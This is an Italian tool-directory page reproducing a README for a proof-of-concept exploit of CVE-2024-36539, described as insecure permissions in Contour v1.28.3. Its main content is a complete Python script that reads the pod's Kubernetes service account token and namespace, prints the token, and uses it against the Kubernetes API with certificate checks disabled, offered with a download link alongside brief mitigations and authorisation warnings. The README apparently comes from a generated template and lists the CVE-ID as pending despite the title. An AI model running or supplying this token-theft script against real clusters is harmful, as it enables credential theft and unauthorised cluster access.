Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36539 — Proof-of-concept exploit che dimostra permessi non sicuri in Contour v1.28.3, consentendo il furto del token dell'account di servizio e l'accesso all'API Kubernetes per l'escalation dei privilegi. | Kitploit
Strumenti/GitHubGitHub/abdurahmon3236/cve-2024-36539
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingSicurezza CloudRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
abdurahmon3236/cve-2024-36539

CVE-2024-36539

Proof-of-concept exploit che dimostra permessi non sicuri in Contour v1.28.3, consentendo il furto del token dell'account di servizio e l'accesso all'API Kubernetes per l'escalation dei privilegi.

Vedi Repository
2 anni faNon ancora revisionato

Ecco un README.md per un Proof of Concept (PoC) che dimostra la vulnerabilità di permessi non sicuri in Contour v1.28.3:


Proof of Concept (PoC) per la vulnerabilità di permessi non sicuri in Contour v1.28.3

Questo repository contiene uno script Proof of Concept (PoC) che dimostra una vulnerabilità di permessi non sicuri in Contour v1.28.3. Questa vulnerabilità consente agli aggressori di accedere a dati sensibili ed escalation dei privilegi ottenendo il token dell'account di servizio.

Descrizione della vulnerabilità

CVE-ID: (In attesa)

Panoramica: Contour v1.28.3 contiene permessi non sicuri che consentono agli aggressori di accedere al token dell'account di servizio. Sfruttando questa vulnerabilità, un aggressore può ottenere il token dell'account di servizio, che può essere utilizzato per accedere a dati sensibili e potenzialmente escalation dei privilegi all'interno del cluster Kubernetes.

Versioni interessate:

  • Contour v1.28.3

Mitigazioni:

  • Rivedere e regolare i permessi degli account di servizio utilizzati da Contour.
  • Assicurarsi che gli account di servizio abbiano i permessi minimi richiesti.
  • Controllare e ruotare regolarmente i token degli account di servizio.

Dettagli del PoC

Questo script PoC dimostra come accedere al token dell'account di servizio in Contour v1.28.3. Assicurati di avere il permesso esplicito per eseguire questo test.

Script del PoC

root@kitploit:~
import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

Spiegazione

  1. Configurazione: Lo script configura l'URL dell'API Kubernetes e i percorsi per il token dell'account di servizio e i file del namespace.
  2. Ottenere il token dell'account di servizio: Legge il token dell'account di servizio dal filesystem.
  3. Ottenere il namespace: Legge il namespace dal filesystem.
  4. Accedere all'API Kubernetes: Utilizza il token per effettuare una richiesta all'API Kubernetes per elencare i pod nel namespace.

Considerazioni importanti

  • Permessi: Assicurati di avere il permesso esplicito per testare questa vulnerabilità sul sistema target. Test non autorizzati sono illegali e non etici.
  • Ambiente di test: Esegui i test in un ambiente controllato per evitare impatti sui sistemi di produzione.
  • Uso etico: Utilizza questo PoC in modo responsabile e solo in contesti autorizzati.

Mitigazione

Per affrontare questa vulnerabilità:

  1. Rivedere i permessi degli account di servizio: Assicurati che gli account di servizio abbiano i permessi minimi richiesti.
  2. Controllare e ruotare i token: Controlla regolarmente gli account di servizio e ruota i token per ridurre al minimo il rischio di compromissione dei token.
  3. Aggiornare Contour: Mantieni Contour e altri componenti Kubernetes aggiornati con le ultime patch di sicurezza.

Per maggiori informazioni sulla sicurezza della tua distribuzione Contour, fai riferimento alla documentazione ufficiale di Contour.


Questo README.md fornisce una panoramica della vulnerabilità, uno script PoC per dimostrare il problema e istruzioni su come mitigare il rischio. Assicurati di gestire questo PoC in modo responsabile e solo su sistemi per cui hai autorizzazione esplicita.

Scarica lo strumento